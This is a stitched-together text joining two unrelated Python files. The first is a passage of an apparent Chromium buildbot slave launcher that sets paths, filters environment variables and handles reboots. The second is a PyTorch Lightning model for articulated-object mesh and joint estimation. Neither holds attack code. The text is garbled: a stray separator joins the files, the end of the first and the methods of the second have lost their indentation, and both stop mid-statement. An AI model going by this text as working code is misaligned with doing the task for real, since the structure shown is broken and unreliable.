        os.path.join(BUILD_DIR, 'third_party', 'infra_libs'),
        os.path.join(BUILD_DIR, 'third_party', 'oauth2client'),
        os.path.join(BUILD_DIR, 'third_party', 'pyasn1'),
        os.path.join(BUILD_DIR, 'third_party', 'pyasn1-modules'),
        os.path.join(BUILD_DIR, 'third_party', 'python-rsa'),
        os.path.join(BUILD_DIR, 'third_party', 'requests_2_10_0'),
        os.path.join(BUILD_DIR, 'third_party', 'setuptools-0.6c11'),
        os.path.join(BUILD_DIR, 'third_party', 'site-packages'),
        os.path.join(BUILD_DIR, 'third_party', 'uritemplate'),
        os.path.join(ROOT_DIR, 'build_internal', 'site_config'),
        os.path.join(ROOT_DIR, 'build_internal', 'symsrc'),
        SCRIPT_DIR,  # Include the current working directory by default.
    ]
    # Need to update sys.path prior to the following imports. Remove any
    # dist-packages and site-packages directories from the path - we want all
    # our dependencies to come from third_party, not from random packages that
    # happen to be installed on the machine. We want to *remove* the paths
    # (rather than just being before them) because conflicts occur when a
    # module is found in multiple locations on the path. In particular this
    # causes problems when google-protobuf is installed as a system package
    # (often at an earlier version than ours in third_party). It uses
    # setuptools to make "google" a namespace package, and importing
    # google.protobuf then gets us the wrong one.
    if sys.platform == 'win32':
        # Don't remove site-packages on Windows. pywin32 is in there, which is
        # needed by twisted.
        filtered_sys_path = sys.path
    else:
        filtered_sys_path = [
            x for x in sys.path
            if 'dist-packages' not in x and 'site-packages' not in x]
    sys.path = python_path + filtered_sys_path
    # Late imports: these only resolve after the sys.path surgery above.
    import slave.bootstrap
    import config_bootstrap
    active_slavename = chromium_utils.GetActiveSlavename()
    config_bootstrap.Master.active_slavename = active_slavename
    active_master_class_name = chromium_utils.GetActiveMaster(active_slavename)
    if not active_master_class_name:
        raise RuntimeError('*** Failed to detect the active master')
    active_master = GetActiveMasterClass(
        active_master_class_name, slave.bootstrap, config_bootstrap)
    active_subdir = chromium_utils.GetActiveSubdir()
    # Pick the buildbot/twisted versions the master asks for and put them at
    # the front of sys.path.
    bb_ver, tw_ver = GetThirdPartyVersions(active_master)
    python_path.append(os.path.join(BUILD_DIR, 'third_party', bb_ver))
    python_path.append(os.path.join(BUILD_DIR, 'third_party', tw_ver))
    sys.path = python_path[-2:] + sys.path
    os.environ['PYTHONPATH'] = (
        os.pathsep.join(python_path) + os.pathsep + os.environ['PYTHONPATH'])
    os.environ['CHROME_HEADLESS'] = '1'
    os.environ['PAGER'] = 'cat'
    # Platform-specific initialization.
    if sys.platform.startswith('win'):
        # list of all variables that we want to keep
        env_var = [
            'APPDATA',
            'BUILDBOT_ARCHIVE_FORCE_SSH',
            'CHROME_HEADLESS',
            'CHROMIUM_BUILD',
            'CLASSPATH',
            'COMMONPROGRAMFILES',
            'COMMONPROGRAMFILES(X86)',
            'COMMONPROGRAMW6432',
            'COMPUTERNAME',
            'COMSPEC',
            'DBUS_SESSION_BUS_ADDRESS',
            'DEPOT_TOOLS_GIT_BLEEDING',
            'DXSDK_DIR',
            'GIT_USER_AGENT',
            'HOME',
            'HOMEDRIVE',
            'HOMEPATH',
            'JAVA_HOME',
            'JDK_HOME',
            'JRE_HOME',
            'LOCALAPPDATA',
            'NUMBER_OF_PROCESSORS',
            'OS',
            'PATH',
            'PATHEXT',
            'PROCESSOR_ARCHITECTURE',
            'PROCESSOR_ARCHITEW6432',
            'PROCESSOR_IDENTIFIER',
            'PROGRAMFILES',
            'PROGRAMFILES(X86)',
            'PROGRAMW6432',
            'PYTHONPATH',
            'PYTHONUNBUFFERED',
            'SYSTEMDRIVE',
            'SYSTEMROOT',
            'TEMP',
            'TESTING_MASTER',
            'TESTING_MASTER_HOST',
            'TESTING_SLAVENAME',
            'TMP',
            'USERDOMAIN',
            'USERNAME',
            'USERPROFILE',
            'VS100COMNTOOLS',
            'VS110COMNTOOLS',
            'WINDIR',
        ]
        remove_all_vars_except(os.environ, env_var)
        # Extend the env variables with the chrome-specific settings. Tailor
        # the slave process' (and derivative tasks') PATH environment variable.
        slave_path = [
            depot_tools,
            # Reuse the python executable used to start this script.
            os.path.dirname(sys.executable),
            os.path.join(os.environ['SYSTEMROOT'], 'system32'),
            os.path.join(os.environ['SYSTEMROOT'], 'system32', 'WBEM'),
            # Use os.sep to make this absolute, not relative.
            os.path.join(os.environ['SYSTEMDRIVE'], os.sep, 'Program Files',
                         '7-Zip'),
            # TODO(hinoka): Remove this when its no longer needed crbug.com/481695
            os.path.join(os.environ['SYSTEMDRIVE'], os.sep, 'cmake', 'bin'),
        ]
        # Include Windows PowerShell in PATH, if defined.
        def which_path(cmd):
            # Returns [dir] of the resolved executable, or [] if not found.
            path = chromium_utils.Which(cmd)
            return ([os.path.dirname(os.path.abspath(path))] if path else [])
        slave_path += which_path('powershell.exe')
        # build_internal/tools contains tools we can't redistribute.
        tools = os.path.join(ROOT_DIR, 'build_internal', 'tools')
        if os.path.isdir(tools):
            slave_path.append(os.path.abspath(tools))
        if 'JAVA_HOME' in os.environ:
            slave_path.append(os.path.join(os.environ['JAVA_HOME'], 'bin'))
        os.environ['PATH'] = os.pathsep.join(slave_path)
        os.environ['LOGNAME'] = os.environ['USERNAME']
    elif sys.platform in ('darwin', 'posix', 'linux2'):
        # list of all variables that we want to keep
        env_var = [
            'CCACHE_DIR',
            'CHROME_ALLOCATOR',
            'CHROME_HEADLESS',
            'CHROME_VALGRIND_NUMCPUS',
            'CLASSPATH',
            'DISPLAY',
            'DISTCC_DIR',
            'GIT_USER_AGENT',
            'HOME',
            'HOSTNAME',
            'HTTP_PROXY',
            'http_proxy',
            'HTTPS_PROXY',
            'JAVA_HOME',
            'JDK_HOME',
            'JRE_HOME',
            'LANG',
            'LOGNAME',
            'PAGER',
            'PATH',
            'PWD',
            'PYTHONPATH',
            'PYTHONUNBUFFERED',
            'SHELL',
            'SSH_AGENT_PID',
            'SSH_AUTH_SOCK',
            'SSH_CLIENT',
            'SSH_CONNECTION',
            'SSH_TTY',
            'TESTING_MASTER',
            'TESTING_MASTER_HOST',
            'TESTING_SLAVENAME',
            'TMPDIR',
            'USER',
            'USERNAME',
        ]
        remove_all_vars_except(os.environ, env_var)
        slave_path = [
            os.path.join(os.path.expanduser('~'), 'slavebin'),
            depot_tools,
        ]
        # Git on mac is installed from git-scm.com/download/mac
        if sys.platform == 'darwin' and os.path.isdir('/usr/local/git/bin'):
            slave_path.append('/usr/local/git/bin')
        slave_path += [
            # Reuse the python executable used to start this script.
            os.path.dirname(sys.executable),
            '/usr/bin', '/bin', '/usr/sbin', '/sbin', '/usr/local/bin'
        ]
        if 'JAVA_HOME' in os.environ:
            slave_path.append(os.path.join(os.environ['JAVA_HOME'], 'bin'))
        os.environ['PATH'] = os.pathsep.join(slave_path)
    else:
        error('Platform %s is not implemented yet' % sys.platform)
    # Export the active master name in the enviornment. We do this because some
    # scripts actually rely on this value, and it is not available otherwise.
    #
    # XXX: This is a BuildBot transition hack. Please do NOT use these
    # variables. They will go away and if you use them, we're not going to fix
    # your code; it will just break.
    os.environ['INFRA_BUILDBOT_MASTER_CLASS_NAME'] = active_master_class_name
    os.environ['INFRA_BUILDBOT_SLAVE_NAME'] = active_slavename
    os.environ['INFRA_BUILDBOT_SLAVE_ACTIVE_SUBDIR'] = active_subdir or ''
    git_exe = 'git' + ('.bat' if sys.platform.startswith('win') else '')
    try:
        git_version = subprocess.check_output([git_exe, '--version'])
    except (OSError, subprocess.CalledProcessError) as e:
        Log('WARNING: Could not get git version information: %r' % e)
        git_version = '?'
    # Add some extra information to the git User-Agent string to allow for
    # logging/debugging on the server side.
    # This string needs to begin with git/X.Y.Z otherwise for certain servers
    # (e.g. github) fail to recognize the request as coming from git.
    os.environ.setdefault('GIT_USER_AGENT', 'git/%s %s %s' % (
        git_version.rstrip().split()[-1], sys.platform, socket.getfqdn()))
    # This may be redundant, unless this is imported and main is called.
    UseBotoPath()
    # This envrionment is defined only when testing the slave on a dev machine.
    is_testing = 'TESTING_MASTER' in os.environ
    HotPatchSlaveBuilder(is_testing)
    # Run the buildbot slave; twistd.run() blocks until the slave exits.
    import twisted.scripts.twistd as twistd
    twistd.run()
    shutdown_file = os.path.join(os.path.dirname(__file__), 'shutdown.stamp')
    if os.path.isfile(shutdown_file):
        # If this slave is being shut down gracefully, don't reboot it.
        try:
            os.remove(shutdown_file)
            # Only disable reboot if the file can be removed. Otherwise, the
            # slave might get stuck offline after every build.
            global needs_reboot
            needs_reboot = False
        except OSError:
            Log('Could not delete graceful shutdown signal file %s' % shutdown_file)
    # Although prevent_reboot_file looks similar to shutdown_file above, it is
    # not the same as shutdown.stamp is actually used by Buildbot to shut down
    # the slave process, while ~/no_reboot prevents rebooting the slave
    # machine.
    prevent_reboot_file = os.path.join(os.path.expanduser('~'), 'no_reboot')
    if needs_reboot:
        if not os.path.isfile(prevent_reboot_file):
            # Send the appropriate system shutdown command.
            Reboot()
            # This line should not be reached.
        else:
            Log('Reboot was prevented by %s. Please remove the file and reboot the '
                'slave manually to resume automatic reboots.' % prevent_reboot_file)
def EnvWithDepotTools(**kwargs):
    """Returns the current environment with depot_tools appended to the PATH.

    Extra keyword arguments are added to the returned dict.
    """
    extended_path = os.pathsep.join(
        [os.environ.get('PATH', ''), os.path.join(ROOT_DIR, 'depot_tools')])
    return dict(os.environ, PATH=extended_path, **kwargs)
def GetGClientPath():
    """Returns the path to the gclient executable inside depot_tools.

    Raises RuntimeError on non-Windows platforms when the executable is
    missing (i.e. depot_tools is not properly installed).
    """
    base = os.path.join(ROOT_DIR, 'depot_tools', 'gclient')
    if sys.platform.startswith('win'):
        # Windows uses the batch wrapper.
        return base + '.bat'
    if os.path.isfile(base):
        return base
    raise RuntimeError('gclient not found. Check that depot_tools is '
                       'properly installed')
def CreateForwardSignalHandler(popen_object, signal_to_send):
    """Builds a handler that forwards signal_to_send to popen_object.

    The returned callable matches the signal.signal handler signature.
    """
    def _Forward(signal_received, _frame):
        message = 'Received signal %s. Send a signal %s to pid %s' % (
            signal_received, signal_to_send, popen_object.pid)
        Log(message)
        popen_object.send_signal(signal_to_send)
    return _Forward
if '__main__' == __name__:
skip_sync_arg = '--no-gclient-sync'
if skip_sync_arg not in sys.argv:
UseBotoPath()
if subprocess.call(
[GetGClientPath(), 'sync', '--force', '--break_repo_locks'],
env=EnvWithDepotTools()) != 0:
| |
import json
import os
from copy import deepcopy
from pprint import pprint
import numpy as np
import pytorch_lightning as pl
import torch
import torch.nn.functional as F
import trimesh
from torch import nn, optim
from torchmetrics import AverageMeter, Precision, Recall
from src.models.modules import create_network
from src.models.modules.losses_dense_joint import PrismaticLoss, RevoluteLoss
from src.third_party.ConvONets.conv_onet.generation_two_stage import Generator3D
from src.utils import utils
from src.utils.chamfer import compute_trimesh_chamfer
from src.utils.joint_estimation import (
aggregate_dense_prediction_r,
eval_joint_p,
eval_joint_r,
)
from src.utils.misc import get_gt_mesh_from_data
from src.utils.visual import as_mesh
log = utils.get_logger(__name__)
# different head for occupancy and segmentation
# predict dense joint
class GeoArtModelV0(pl.LightningModule):
def __init__(self, opt, network):
    """Builds the network, loss criteria and evaluation meters.

    Args:
        opt: experiment options; entries of ``opt.hparams`` are copied into
            ``self.hparams`` and saved with the checkpoint.
        network: network specification forwarded to ``create_network``.
    """
    super().__init__()
    self.opt = opt
    # Copy user hyper-parameters into Lightning's hparams store so
    # save_hyperparameters() checkpoints them.
    for k, v in opt.hparams.items():
        self.hparams[k] = v
    self.save_hyperparameters(self.hparams)
    self.model = create_network(network)
    # Binary cross-entropy (with logits) shared by the occupancy,
    # segmentation and joint-type classification heads.
    self.cri_cls = nn.BCEWithLogitsLoss()
    self.cri_joint_p = PrismaticLoss(self.hparams)
    self.cri_joint_r = RevoluteLoss(self.hparams)
    # Validation meters: precision/recall and IoU for occupancy/segmentation.
    self.occ_pr_meter = Precision(average="micro")
    self.occ_rc_meter = Recall(average="micro")
    self.seg_pr_meter = Precision(average="micro")
    self.seg_rc_meter = Recall(average="micro")
    self.occ_iou_meter = AverageMeter()
    self.seg_iou_meter = AverageMeter()
    # Articulation error meters, split by joint type
    # (joint_type 0 = revolute, 1 = prismatic; see validation_step).
    self.revoluted_axis_ori_meter = AverageMeter()
    self.revoluted_degree_meter = AverageMeter()
    self.revoluted_p2l_ori_meter = AverageMeter()
    self.revoluted_p2l_dist_meter = AverageMeter()
    self.revoluted_displacement_meter = AverageMeter()
    self.prismatic_axis_ori_meter = AverageMeter()
    self.prismatic_offset_meter = AverageMeter()
def forward(self, *args):
    """Delegates the forward pass to the wrapped network and returns its outputs."""
    outputs = self.model(*args)
    return outputs
def training_step(self, data, batch_idx):
    """Computes the weighted occupancy/segmentation/joint loss for one batch.

    Individual loss terms are logged under ``train/``; the weighted sum is
    returned for optimization.
    """
    (
        logits_occ,
        logits_seg,
        logits_joint_type,
        joint_param_revolute,
        joint_param_prismatic,
    ) = self(data["pc_start"], data["pc_end"], data["p_occ"], data["p_seg"])
    # Broadcast the per-sample joint type to a per-point label.
    joint_label = data["joint_type"].unsqueeze(-1).repeat(1, data["p_seg"].size(1))
    loss_occ = self.cri_cls(logits_occ, data["occ_label"].float())
    loss_seg = self.cri_cls(logits_seg, data["seg_label"].float())
    loss_joint_cls = self.cri_cls(logits_joint_type, joint_label.float())
    # Prismatic head channels: axis direction (:3), configuration t (3).
    joint_p_axis = joint_param_prismatic[:, :, :3]
    joint_p_t = joint_param_prismatic[:, :, 3]
    # Revolute head channels: axis (:3), configuration t (3),
    # point-to-line vector (4:7), point-to-line distance (7).
    joint_r_axis = joint_param_revolute[:, :, :3]
    joint_r_t = joint_param_revolute[:, :, 3]
    joint_r_p2l_vec = joint_param_revolute[:, :, 4:7]
    joint_r_p2l_dist = joint_param_revolute[:, :, 7]
    # Ground-truth articulation change between the two observed states.
    gt_t = data["state_end"] - data["state_start"]
    loss_prismatic, _ = self.cri_joint_p(
        data["seg_label"].float(),
        joint_p_axis,
        joint_p_t,
        data["screw_axis"],
        gt_t,
    )
    loss_revolute, _ = self.cri_joint_r(
        data["p_seg"],
        data["seg_label"].float(),
        joint_r_axis,
        joint_r_t,
        joint_r_p2l_vec,
        joint_r_p2l_dist,
        data["screw_axis"],
        gt_t,
        data["p2l_vec"],
        data["p2l_dist"],
    )
    # joint_type: 0 = revolute, 1 = prismatic. Select the matching
    # parameter loss; mixed batches use a one-hot mask per sample.
    if data["joint_type"].sum() == 0:
        # revolute only
        loss_joint_param = loss_revolute.mean()
    elif data["joint_type"].mean() == 1:
        # prismatic only
        loss_joint_param = loss_prismatic.mean()
    else:
        mask_reg = F.one_hot(data["joint_type"].long(), num_classes=2)
        loss_joint_param = (
            torch.stack((loss_revolute, loss_prismatic), dim=1) * mask_reg
        )
        loss_joint_param = loss_joint_param.sum(-1).mean()
    loss = (
        self.hparams.loss_weight_occ * loss_occ
        + self.hparams.loss_weight_seg * loss_seg
        + self.hparams.loss_weight_joint_type * loss_joint_cls
        + self.hparams.loss_weight_joint_param * loss_joint_param
    )
    # loss = loss_occ
    self.log("train/loss_occ", loss_occ)
    self.log("train/loss_seg", loss_seg)
    self.log("train/loss_joint_cls", loss_joint_cls)
    self.log("train/loss_joint_param", loss_joint_param)
    self.log("train/loss", loss, on_step=False, on_epoch=True, prog_bar=True)
    return loss
def validation_step(self, data, batch_idx):
    """Computes validation losses and accumulates per-joint-type metrics.

    Mirrors ``training_step`` for the loss terms (logged under ``val/``),
    then updates precision/recall/IoU meters and the articulation error
    meters that ``validation_epoch_end`` flushes.
    """
    (
        logits_occ,
        logits_seg,
        logits_joint_type,
        joint_param_revolute,
        joint_param_prismatic,
    ) = self(data["pc_start"], data["pc_end"], data["p_occ"], data["p_seg"])
    # Broadcast the per-sample joint type to a per-point label.
    joint_label = data["joint_type"].unsqueeze(-1).repeat(1, data["p_seg"].size(1))
    loss_occ = self.cri_cls(logits_occ, data["occ_label"].float())
    loss_seg = self.cri_cls(logits_seg, data["seg_label"].float())
    loss_joint_cls = self.cri_cls(logits_joint_type, joint_label.float())
    # Head channel layout: see training_step.
    joint_p_axis = joint_param_prismatic[:, :, :3]
    joint_p_t = joint_param_prismatic[:, :, 3]
    joint_r_axis = joint_param_revolute[:, :, :3]
    joint_r_t = joint_param_revolute[:, :, 3]
    joint_r_p2l_vec = joint_param_revolute[:, :, 4:7]
    joint_r_p2l_dist = joint_param_revolute[:, :, 7]
    gt_t = data["state_end"] - data["state_start"]
    loss_prismatic, prismatic_result_dict = self.cri_joint_p(
        data["seg_label"].float(),
        joint_p_axis,
        joint_p_t,
        data["screw_axis"],
        gt_t,
    )
    loss_revolute, revolute_result_dict = self.cri_joint_r(
        data["p_seg"],
        data["seg_label"].float(),
        joint_r_axis,
        joint_r_t,
        joint_r_p2l_vec,
        joint_r_p2l_dist,
        data["screw_axis"],
        gt_t,
        data["p2l_vec"],
        data["p2l_dist"],
    )
    # Unlike training_step there is no pure-batch shortcut: always mask.
    mask_reg = F.one_hot(data["joint_type"].long(), num_classes=2)
    loss_joint_param = (
        torch.stack((loss_revolute, loss_prismatic), dim=1) * mask_reg
    )
    loss_joint_param = loss_joint_param.sum(-1).mean()
    loss = (
        self.hparams.loss_weight_occ * loss_occ
        + self.hparams.loss_weight_seg * loss_seg
        + self.hparams.loss_weight_joint_type * loss_joint_cls
        + self.hparams.loss_weight_joint_param * loss_joint_param
    )
    # loss = loss_occ
    self.log("val/loss_occ", loss_occ)
    self.log("val/loss_seg", loss_seg)
    self.log("val/loss_joint_cls", loss_joint_cls)
    self.log("val/loss_joint_param", loss_joint_param)
    self.log("val/loss", loss, on_step=False, on_epoch=True, prog_bar=True)
    prob_occ = torch.sigmoid(logits_occ)
    prob_seg = torch.sigmoid(logits_seg)
    self.occ_pr_meter.update(prob_occ, data["occ_label"].long())
    self.occ_rc_meter.update(prob_occ, data["occ_label"].long())
    self.seg_pr_meter.update(prob_seg, data["seg_label"].long())
    self.seg_rc_meter.update(prob_seg, data["seg_label"].long())
    # IoU = |pred AND gt| / |pred OR gt| after thresholding.
    occ_and = torch.logical_and(
        (prob_occ > self.hparams.test_occ_th), data["occ_label"].bool()
    )
    occ_or = torch.logical_or(
        (prob_occ > self.hparams.test_occ_th), data["occ_label"].bool()
    )
    occ_iou = occ_and.float().sum(-1) / occ_or.float().sum(-1)
    seg_and = torch.logical_and(
        (prob_seg > self.hparams.test_seg_th), data["seg_label"].bool()
    )
    seg_or = torch.logical_or(
        (prob_seg > self.hparams.test_seg_th), data["seg_label"].bool()
    )
    seg_iou = seg_and.float().sum(-1) / seg_or.float().sum(-1)
    self.occ_iou_meter.update(occ_iou)
    self.seg_iou_meter.update(seg_iou)
    # .item() requires a single-element tensor — assumes effective
    # validation batch size 1 here; TODO confirm against the datamodule.
    if data["joint_type"].item() == 0:  # revoluted
        self.revoluted_axis_ori_meter.update(revolute_result_dict["axis_ori"])
        if self.hparams["r_cos_ambiguity"]:
            # Sign-ambiguous axis: score the better of +t / -t.
            config_error = torch.minimum(
                (gt_t - joint_r_t).abs(), (gt_t + joint_r_t).abs()
            )
        else:
            config_error = (gt_t - joint_r_t).abs()
        self.revoluted_degree_meter.update((config_error).abs())
        self.revoluted_p2l_ori_meter.update(revolute_result_dict["p2l_ori"])
        self.revoluted_p2l_dist_meter.update(revolute_result_dict["p2l_dist"])
        self.revoluted_displacement_meter.update(
            revolute_result_dict["displacement"]
        )
    elif data["joint_type"].item() == 1:  # prismatic
        self.prismatic_axis_ori_meter.update(prismatic_result_dict["axis_ori"])
        if self.hparams["p_cos_ambiguity"]:
            config_error = torch.minimum(
                (gt_t - joint_p_t).abs(), (gt_t + joint_p_t).abs()
            )
        else:
            config_error = (gt_t - joint_p_t).abs()
        # NOTE(review): the prismatic config error is accumulated into
        # revoluted_degree_meter — possibly intended for a prismatic meter;
        # confirm before relying on val/revoluted_degree.
        self.revoluted_degree_meter.update((config_error).abs())
        self.prismatic_offset_meter.update((gt_t - joint_p_t).abs())
    return loss
def log_meter(self, meter, name):
    """Computes a meter, logs it as ``val/<name>`` and resets the meter."""
    value = meter.compute()
    meter.reset()
    self.log("val/" + name, value)
def validation_epoch_end(self, val_step_outputs):
    """Flushes every accumulated validation meter to the logger at epoch end."""
    meters = (
        (self.occ_pr_meter, "occ_precision"),
        (self.occ_rc_meter, "occ_recall"),
        (self.seg_pr_meter, "seg_precision"),
        (self.seg_rc_meter, "seg_recall"),
        (self.occ_iou_meter, "occ_iou"),
        (self.seg_iou_meter, "seg_iou"),
        (self.revoluted_axis_ori_meter, "revoluted_axis_ori"),
        (self.revoluted_degree_meter, "revoluted_degree"),
        (self.revoluted_p2l_ori_meter, "revoluted_p2l_ori"),
        (self.revoluted_p2l_dist_meter, "revoluted_p2l_dist"),
        (self.revoluted_displacement_meter, "revoluted_displacement"),
        (self.prismatic_axis_ori_meter, "prismatic_axis_ori"),
        (self.prismatic_offset_meter, "prismatic_offset"),
    )
    for meter, name in meters:
        self.log_meter(meter, name)
def test_step(self, data, batch_idx):
    """Reconstructs meshes and joint parameters for one test sample.

    Writes meshes, a bounding box, an URDF and a quantitative summary into
    ``results/<batch_idx>/`` and returns a dict with geometry (chamfer) and
    articulation errors.
    """
    save_dir = f"results/{batch_idx:04d}/"
    # NOTE(review): makedirs without exist_ok fails if the directory already
    # exists — presumably each test run starts from a clean cwd; confirm.
    os.makedirs(save_dir)

    # Numerically safe L2 normalization along `dim`.
    def normalize(tensor: torch.Tensor, dim: int) -> torch.Tensor:
        return tensor / ((tensor ** 2).sum(dim, keepdim=True).sqrt() + 1.0e-5)

    # only support batch size 1
    assert data["pc_start"].size(0) == 1
    mesh_pose_dict = np.load(data["data_path"][0], allow_pickle=True)[
        "start_mesh_pose_dict"
    ].item()
    # Lazily build the mesh generator once and reuse it across test steps.
    if not hasattr(self, "generator"):
        self.generator = Generator3D(
            self.model,
            device=self.device,
            threshold=self.hparams.test_occ_th,
            seg_threshold=self.hparams.test_seg_th,
            input_type="pointcloud",
            refinement_step=0,
            padding=0.1,
            resolution0=self.hparams.test_res,
        )
    # evaluate mesh
    mesh_dict, mobile_points_all, c, _ = self.generator.generate_mesh(data)
    gt_mesh_dict = get_gt_mesh_from_data(data, mesh_pose_dict)
    # Chamfer distances in millimeter-like units (x1000).
    cd_whole = (
        compute_trimesh_chamfer(
            as_mesh(trimesh.Scene(mesh_dict.values())),
            as_mesh(trimesh.Scene(gt_mesh_dict.values())),
            0,
            1,
        )
        * 1000
    )
    cd_mobile = compute_trimesh_chamfer(mesh_dict[1], gt_mesh_dict[1], 0, 1) * 1000
    # Skip URDF export when either chamfer distance failed (NaN).
    if np.isnan(cd_mobile) or np.isnan(cd_whole):
        write_urdf = False
    else:
        write_urdf = True
        # mesh_dict[0] = static part, mesh_dict[1] = mobile part.
        static_part_simp = mesh_dict[0].simplify_quadratic_decimation(10000)
        mobile_part_simp = mesh_dict[1].simplify_quadratic_decimation(10000)
        mobile_part_simp.visual.face_colors = np.array(
            [84, 220, 83, 255], dtype=np.uint8
        )
        _ = static_part_simp.export(os.path.join(save_dir, "static.obj"))
        _ = mobile_part_simp.export(os.path.join(save_dir, "mobile.obj"))
        bounds = as_mesh(trimesh.Scene(mesh_dict.values())).bounds
        bbox_dict = {"min": list(bounds[0]), "max": list(bounds[1])}
        with open(os.path.join(save_dir, "bounding_box.json"), "w") as f:
            json.dump(bbox_dict, f)
    # Re-encode the inputs for joint decoding and release the meshes.
    c = self.model.encode_inputs(data["pc_start"], data["pc_end"])
    mesh_dict = None
    result = {
        "geo": {
            "cd_whole": cd_whole,
            "cd_mobile": cd_mobile,
        },
    }
    # No mobile points predicted: articulation cannot be evaluated.
    # NOTE(review): this early return yields a result without an
    # "articulation" key — see test_epoch_end.
    if mobile_points_all.size(1) == 0:
        return result
    (
        logits_joint_type,
        joint_param_revolute,
        joint_param_prismatic,
    ) = self.model.decode_joints(mobile_points_all, c)
    # articulation evaluation
    # Mean sigmoid over all mobile points; > 0.5 means prismatic.
    joint_type_prob = logits_joint_type.sigmoid().mean()
    correct = (joint_type_prob > 0.5).long().item() == data["joint_type"][
        0
    ].long().item()
    # revolute
    if data["joint_type"][0].item() == 0:
        gt_t = (data["state_end"] - data["state_start"]).cpu()[0].numpy()
        gt_axis = data["screw_axis"].cpu()[0].numpy()
        # Ground-truth pivot: mean of per-point projections onto the axis.
        gt_pivot_point = data["p_seg"] + data["p2l_vec"] * data[
            "p2l_dist"
        ].unsqueeze(-1)
        gt_pivot_point = gt_pivot_point[0].mean(0).cpu().numpy()
        # axis voting
        joint_r_axis = (
            normalize(joint_param_revolute[:, :, :3], -1)[0].cpu().numpy()
        )
        joint_r_t = joint_param_revolute[:, :, 3][0].cpu().numpy()
        joint_r_p2l_vec = (
            normalize(joint_param_revolute[:, :, 4:7], -1)[0].cpu().numpy()
        )
        joint_r_p2l_dist = joint_param_revolute[:, :, 7][0].cpu().numpy()
        p_seg = mobile_points_all[0].cpu().numpy()
        pivot_point = p_seg + joint_r_p2l_vec * joint_r_p2l_dist[:, np.newaxis]
        (
            joint_axis_pred,
            pivot_point_pred,
            config_pred,
        ) = aggregate_dense_prediction_r(
            joint_r_axis, pivot_point, joint_r_t, method="mean"
        )
        axis_ori_err, axis_displacement, config_err = eval_joint_r(
            (joint_axis_pred, pivot_point_pred, config_pred),
            (gt_axis, gt_pivot_point, gt_t),
        )
        result["articulation"] = {
            "revolute": {
                "axis_orientation": axis_ori_err,
                "axis_displacement": axis_displacement,
                "config_err": config_err,
            },
            "prismatic": None,
            "joint_type": {"accuracy": correct},
        }
    # prismatic
    else:
        gt_t = (data["state_end"] - data["state_start"]).cpu()[0].numpy()
        gt_axis = data["screw_axis"].cpu()[0].numpy()
        # Prismatic joints have no meaningful pivot; use the origin.
        gt_pivot_point = np.zeros(3)
        pivot_point_pred = np.zeros(3)
        # axis voting
        joint_p_axis = (
            normalize(joint_param_prismatic[:, :, :3], -1)[0].cpu().numpy()
        )
        joint_axis_pred = joint_p_axis.mean(0)
        joint_p_t = joint_param_prismatic[:, :, 3][0].cpu().numpy()
        config_pred = joint_p_t.mean()
        axis_ori_err, config_err = eval_joint_p(
            (joint_axis_pred, config_pred), (gt_axis, gt_t)
        )
        result["articulation"] = {
            "prismatic": {
                "axis_orientation": axis_ori_err,
                "config_err": config_err,
            },
            "revolute": None,
            "joint_type": {"accuracy": correct},
        }
    # write result URDF
    if write_urdf:
        root_dir = os.path.abspath(
            os.path.join(
                __file__,
                os.path.pardir,
                os.path.pardir,
                os.path.pardir,
            )
        )
        with open(os.path.join(root_dir, "template.urdf")) as f:
            urdf_txt = f.read()
        # joint_type_prob < 0.5 means revolute (type 0).
        if joint_type_prob.item() < 0.5:
            joint_type = "revolute"
        else:
            joint_type = "prismatic"
        urdf_txt = urdf_txt.replace("joint_type", joint_type)
        # "joint_position_r" must be replaced before "joint_position",
        # since the latter is a prefix of the former.
        joint_position_r_txt = " ".join([str(x) for x in -pivot_point_pred])
        urdf_txt = urdf_txt.replace("joint_position_r", joint_position_r_txt)
        joint_position_txt = " ".join([str(x) for x in pivot_point_pred])
        urdf_txt = urdf_txt.replace("joint_position", joint_position_txt)
        joint_axis_txt = " ".join([str(x) for x in joint_axis_pred])
        urdf_txt = urdf_txt.replace("joint_axis", joint_axis_txt)
        # Orient the joint limits around zero depending on the sign of the
        # predicted configuration.
        if config_pred > 0:
            urdf_txt = urdf_txt.replace("joint_state_lower", "0.0")
            urdf_txt = urdf_txt.replace("joint_state_upper", str(config_pred))
        else:
            urdf_txt = urdf_txt.replace("joint_state_upper", "0.0")
            urdf_txt = urdf_txt.replace("joint_state_lower", str(config_pred))
        with open(os.path.join(save_dir, "out.urdf"), "w") as f:
            f.write(urdf_txt)
        # NOTE(review): trailing comma makes object_data a 1-tuple wrapping
        # the dict — confirm downstream consumers of quant.npz expect that.
        object_data = (
            {
                "data_path": data["data_path"][0],
                "center": data["center"][0].cpu().numpy(),
                "scale": data["scale"].item(),
                "joint_index": data["joint_index"].item(),
                "joint_axis": gt_axis,
                "pivot_point": gt_pivot_point,
                "config": gt_t,
            },
        )
        output = {
            "joint_axis": joint_axis_pred,
            "pivot_point": pivot_point_pred,
            "config": config_pred,
            "joint_type": (joint_type_prob > 0.5).long().item(),
        }
        np.savez_compressed(
            os.path.join(save_dir, "quant.npz"),
            eval=result,
            output=output,
            data=object_data,
        )
    return result
def test_epoch_end(self, outputs) -> None:
    """Aggregate per-sample test results and report/save the means.

    `outputs` is the list of dicts returned by the test step; each dict
    has a "geo" section (chamfer-distance metrics) and an "articulation"
    section where exactly one of "revolute"/"prismatic" may be None for
    the joint type that does not apply to that sample.
    """
    # outputs = self.all_gather(outputs)
    # Accumulators mirroring the per-sample result structure.
    results_all = {
        "geo": {
            "cd_whole": [],
            "cd_mobile": [],
        },
        "articulation": {
            "revolute": {
                "axis_orientation": [],
                "axis_displacement": [],
                "config_err": [],
            },
            "prismatic": {"axis_orientation": [], "config_err": []},
            "joint_type": {"accuracy": []},
        },
    }
    for result in outputs:
        for k, v in result["geo"].items():
            # move tensors to host memory before numpy aggregation
            if isinstance(v, torch.Tensor):
                v = v.cpu().numpy()
            results_all["geo"][k].append(v)
        for k, v in result["articulation"].items():
            # v is None for the joint type absent from this sample
            if v is None:
                continue
            for k2, v2 in v.items():
                if isinstance(v2, torch.Tensor):
                    v2 = v2.cpu().numpy()
                results_all["articulation"][k][k2].append(v2)
    # Reduce every metric list to its NaN-ignoring mean.
    results_mean = deepcopy(results_all)
    for k, v in results_all["geo"].items():
        tmp = np.array(v).reshape(-1)
        tmp = np.mean([x for x in tmp if not np.isnan(x)])
        results_mean["geo"][k] = float(tmp)
    for k, v in results_all["articulation"].items():
        for k2, v2 in v.items():
            tmp = np.array(v2).reshape(-1)
